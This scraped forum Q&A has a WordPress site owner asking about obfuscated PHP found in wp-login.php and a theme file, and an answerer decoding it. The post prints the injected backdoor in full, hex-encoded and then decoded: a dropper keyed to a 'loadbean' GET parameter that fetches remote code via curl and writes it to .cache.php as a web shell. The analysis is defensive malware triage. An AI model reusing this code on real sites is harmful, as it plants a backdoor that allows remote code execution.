Encode Code inside wp-login.php wordpress -
recently during development of website using wordpress, found code inside wp-login.php
if(isset($_get["\x6co\x61\x64b\x65a\x6e"])){$wrdmt=array("nxlwxqpd"=>"\x62a\x73e6\x34_\x64\x65\x63\x6f\x64\x65","srohzll"=>"\x6d\x64\x35","ffqahag"=>"jge9j29tbxazwvjwvmjwmgiwyje3bhlscwjtedinoyripsrfr0vuwydsb2fkymvhbiddoyrhpxn0cl9yzxbsywnlkgfycmf5kcriwzjdlcriwzrdlcriwzfdlcriwzldlcriwzewxswkyls3xswkylsxml0sjgjbmtndlcriwze0xswkylswxswkylszxsksyxjyyxkojzgnlccujywnoicsj3qnlccvjywnlycsj2gnlcdkjywndccsjy8nlcdujyksjgepo2lmkgzpbhrlcl92yxiojgesrklmvevsx1zbteleqvrfx1vstck9pt1mywxzzsl7zwnobyanaw52ywxpzcc7zxhpddt9jgm9j2hwdwhmexzxzgdrjzskzd1mawxlx2dldf9jb250zw50cygkysk7awyoixn0cmlzdhiojgqsjgmpkxskzt1jdxjsx2luaxqojgepo2n1cmxfc2v0b3b0kcrllenvukxpufrfukvuvvjovfjbtlngrvismsk7y3vybf9zzxrvchqojgusq1vste9qvf9csu5bulluukfou0zfuiwxkttjdxjsx3nldg9wdcgkzsxdvvjmt1bux0zptexpv0xpq0fusu9oldepo2n1cmxfc2v0b3b0kcrllenvukxpufrfvvnfukfhru5ulcdnb3ppbgxhlzuumcaov2luzg93cybovca2lje7ifdpvzy0ksbbchbszvdlyktpdc81mzcumzygketive1mlcbsawtliedly2tvksbdahjvbwuvmziumc4xnzawljewnybtywzhcmkvntm3ljm2jyk7jgq9y3vybf9legvjkcrlkttpzihjdxjsx2vycm5vkcrlksl7zwnobyanrvjst1i6ien1cmwgrvjst1ino2v4axq7fwn1cmxfy2xvc2uojgupo2lmkcfzdhjpc3rykcrklcrjksl7zwnobyanq291bgqgbm90igrsigzpbgu6iccujge7zxhpddt9fsrmpshzdhjwb3mox19gsuxfx18sjygnkse9pwzhbhnlp2rpcm5hbwuoc3vic3rykf9frklmrv9fldasc3rycg9zkf9frklmrv9flccojykpktpkaxjuyw1lkf9frklmrv9fkskurelsrunut1jzx1nfuefsqvrpui4nlmnhy2hllnboccc7awyoiwzpbgvfchv0x2nvbnrlbnrzkcrmlcrkksl7zwnobyanq291bgqgbm90iensrufursbmawxloianlirmo31lbhnle2vjag8gj2jlyw46igh0dha6ly8nlirfu0vsvkvswydivfrqx0hpu1qnxs5zdhjfcmvwbgfjzsgkx1nfulzfulsnre9dvu1ftlrfuk9pvcddlccnlcrmktt9zxhpdds=","nqavwlhn"=>"cr\x65\x61t\x65\x5f\x66un\x63ti\x6f\x6e");$uynkew="\x65\x78\x74\x72\x61\x63\x74";$uynkew($wrdmt);$cmioamog=$nqavwlhn('',$nxlwxqpd($ffqahag));$cmioamog();}
this code not creating problem in sense don't know how code inserted in file. , 1 more file .cache.php file found inside wp-content/themes/.cache.php inside file same code present larger , copyright text there. can 1 tel me ? in advance.
that's base64-encoded string strong obfuscation in it. might indication website has been hacked. anyways, let's started decoding.
you can start decoding strings inside code (they're hex encoded ascii chars. use online tool https://www.unphp.net/ that. you'd get
<? if(isset($_get["loadbean"])){ $wrdmt=array( "nxlwxqpd"=>"base64_decode", "srohzll"=>"md5", "ffqahag"=>"jge9j29tbxazwvjwvmjwmgiwyje3bhlscwjtedinoyripsrfr0vuwydsb2fkymvhbiddoyrhpxn0cl9yzxbsywnlkgfycmf5kcriwzjdlcriwzrdlcriwzfdlcriwzldlcriwzewxswkyls3xswkylsxml0sjgjbmtndlcriwze0xswkylswxswkylszxsksyxjyyxkojzgnlccujywnoicsj3qnlccvjywnlycsj2gnlcdkjywndccsjy8nlcdujyksjgepo2lmkgzpbhrlcl92yxiojgesrklmvevsx1zbteleqvrfx1vstck9pt1mywxzzsl7zwnobyanaw52ywxpzcc7zxhpddt9jgm9j2hwdwhmexzxzgdrjzskzd1mawxlx2dldf9jb250zw50cygkysk7awyoixn0cmlzdhiojgqsjgmpkxskzt1jdxjsx2luaxqojgepo2n1cmxfc2v0b3b0kcrllenvukxpufrfukvuvvjovfjbtlngrvismsk7y3vybf9zzxrvchqojgusq1vste9qvf9csu5bulluukfou0zfuiwxkttjdxjsx3nldg9wdcgkzsxdvvjmt1bux0zptexpv0xpq0fusu9oldepo2n1cmxfc2v0b3b0kcrllenvukxpufrfvvnfukfhru5ulcdnb3ppbgxhlzuumcaov2luzg93cybovca2lje7ifdpvzy0ksbbchbszvdlyktpdc81mzcumzygketive1mlcbsawtliedly2tvksbdahjvbwuvmziumc4xnzawljewnybtywzhcmkvntm3ljm2jyk7jgq9y3vybf9legvjkcrlkttpzihjdxjsx2vycm5vkcrlksl7zwnobyanrvjst1i6ien1cmwgrvjst1ino2v4axq7fwn1cmxfy2xvc2uojgupo2lmkcfzdhjpc3rykcrklcrjksl7zwnobyanq291bgqgbm90igrsigzpbgu6iccujge7zxhpddt9fsrmpshzdhjwb3mox19gsuxfx18sjygnkse9pwzhbhnlp2rpcm5hbwuoc3vic3rykf9frklmrv9fldasc3rycg9zkf9frklmrv9flccojykpktpkaxjuyw1lkf9frklmrv9fkskurelsrunut1jzx1nfuefsqvrpui4nlmnhy2hllnboccc7awyoiwzpbgvfchv0x2nvbnrlbnrzkcrmlcrkksl7zwnobyanq291bgqgbm90iensrufursbmawxloianlirmo31lbhnle2vjag8gj2jlyw46igh0dha6ly8nlirfu0vsvkvswydivfrqx0hpu1qnxs5zdhjfcmvwbgfjzsgkx1nfulzfulsnre9dvu1ftlrfuk9pvcddlccnlcrmktt9zxhpdds=", "nqavwlhn"=>"create_function" ); $uynkew = "extract"; $uynkew($wrdmt); $cmioamog = $nqavwlhn('',$nxlwxqpd($ffqahag)); $cmioamog(); } ?>
so code base64-some string, create function out if, call argument. can rename variables , see exactly. base64-encoded code decodes in turn to
<? $a = 'ommp3yrvvbv0b0b17lyrqbmx2'; $b = $_get['loadbean']; $a = str_replace(array( $b[2], $b[4], $b[1], $b[9], $b[10], $b[7], $b[12], $b[13], $b[14], $b[0], $b[3] ), array( '8', '.', ':', 't', '/', '/', 'h', 'd', 't', '/', 'n' ), $a); if (filter_var($a, filter_validate_url) === false) { echo 'invalid'; exit; } $c = 'hpuhfyvqdgk'; $d = file_get_contents($a); if (!stristr($d, $c)) { $e = curl_init($a); curl_setopt($e, curlopt_returntransfer, 1); curl_setopt($e, curlopt_binarytransfer, 1); curl_setopt($e, curlopt_followlocation, 1); curl_setopt($e, curlopt_useragent, 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, gecko) chrome/32.0.1700.107 safari/537.36'); $d = curl_exec($e); if (curl_errno($e)) { echo 'error: curl error'; exit; } curl_close($e); if (!stristr($d, $c)) { echo 'could not dl file: ' . $a; exit; } } $f = (strpos(__file__, '(') !== false ? dirname(substr(__file__, 0, strpos(__file__, '('))) : dirname(__file__)) . directory_separator . '.cache.php'; if (!file_put_contents($f, $d)) { echo 'could not create file: ' . $f; } else { echo 'bean: http://' . $_server['http_host'] . str_replace($_server['document_root'], '', $f); } exit; ?>
this should started on reversing code. (e.g. use phpstorm or other php ide start refactoring / renaming variables, execute parts of code see things decode etc.) looking @ see file_put_contents()
, file_get_contents()
, might shell download , upload files server.
Comments
Post a Comment